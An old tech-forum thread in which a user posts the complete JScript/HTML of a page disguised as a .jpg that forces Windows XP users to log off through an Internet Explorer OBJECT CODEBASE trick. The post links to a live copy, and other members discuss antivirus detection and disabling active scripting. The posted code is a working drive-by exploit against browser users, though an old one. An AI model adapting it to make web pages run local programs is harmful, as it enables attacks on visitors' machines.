• This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn more.

XP very vunreable for scripts..

S

ScIveRXP

Guest
#1
Hello - well I found out lately that its really easy to make an XP pc logout - I was direct to a webpage with a .jpg - I thought what could go wrong..

well the .jpg had this as the content :
Code:
<HTML>
	<HEAD>
		<SCRIPT language=JScript>
			var programName=new Array(
				'c:/windows/system32/logoff.exe',
				'c:/winxp/system32/logoff.exe',
				'c:/winnt/system32/logoff.exe'
			);

			function Init(){
				var oPopup=window.createPopup();
				var oPopBody=oPopup.document.body;
				var n,html='';
				for(n=0;n<programName.length;n++)
				html+="<OBJECT NAME='X' CLASSID='CLSID:11111111-1111-1111-1111-111111111111' CODEBASE='"+programName[n]+"' %1='r'></OBJECT>";
				oPopBody.innerHTML=html;
				oPopup.show(290, 390, 200, 200, document.body);
			}
		</SCRIPT>
	</HEAD>
	<BODY onload="Init()">
	You should feel lucky if you dont have XP right now.
	</BODY>
</HTML>
So I saw something and before I knew my XP logged me off.. I asked the maker of this script and he said it was even possible to add users to a system..

If you haven't got XP installed in a standard dir like stated above then you are save - but else its very easy to do harm to XP users...

WOW !!

Don't believe me !? http://www.phphq.nl/xp.jpg (save your work before clicking on this link !!)
 
W

WebDome

Guest
#3
Just visit this page, so he is using js exploit, easy detectible by AV software. If you are using AV, update your windows XP with critical updates you are out of trouble. By the way I am running Win XP Pro and it couldn't shout me down.
 

Shamus MacNoob

Moderator
Political User
#4
Well I am on XP pro as well and I needed to set active scripting off in IE because that exploit was not detected by NAV2002 and all my security patches are up to date at microshot ......and I would be logged off ...... now I am ok but still somethings not right NAV2002 should not let that happen?? ..........
 
W

WebDome

Guest
#5
Norton, neither Mcafee is not a good choice of AV. Try Kaspersky (known as KAV), or NOD 32 (Esset Antivirus).
 
R

Raven76

Guest
#6
Hmmm...my installation is on the D:\ drive so I'm unaffected. That could be a nasty trick if it got you at a bad time.
 
D

dickow

Guest
#7
I have Norton 2002 installed with scripting protection on, tried the web site, and it didn't shut me down on my XP system, so something is working ok.
 

Members online

No members online now.

Latest posts

Latest profile posts

Perris Calderon wrote on Electronic Punk's profile.
Ep, glad to see you come back and tidy up...did want to ask a one day favor, I want to enhance my resume , was hoping you could make me administrator for a day, if so, take me right off since I won't be here to do anything, and don't know the slightest about the board, but it would be nice putting "served administrator osnn", if can do, THANKS

Been running around Quora lately, luv it there https://tinyurl.com/ycpxl
Electronic Punk wrote on Perris Calderon's profile.
All good still mate?
Hello, is there anybody in there? Just nod if you can hear me ...
Xie
What a long strange trip it's been. =)

Forum statistics

Threads
61,962
Messages
673,240
Members
89,015
Latest member
loxioalix